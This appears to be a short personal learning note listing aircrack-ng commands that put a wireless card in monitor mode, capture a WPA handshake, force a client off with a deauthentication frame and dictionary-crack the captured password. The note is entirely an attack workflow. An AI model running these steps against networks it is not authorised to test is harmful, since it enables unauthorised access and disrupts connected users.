I’ve been learning this over the weekend…
airmon-ng start wlan0 (CHANNEL)
View networks:
airodump-ng mon0
Capturing the handshake:
airodump-ng -c (CHANNEL) --bssid (BSSID) -w (FILENAME) wlan0
DeAuthenticate one of the clients to capture the handshake:
aireplay-ng -0 1 -a (BSSID) -c (CLIENT) wlan0
Let’s crack this:
aircrack-ng -w password.lst -b (BSSID) (FILENAME)*.cap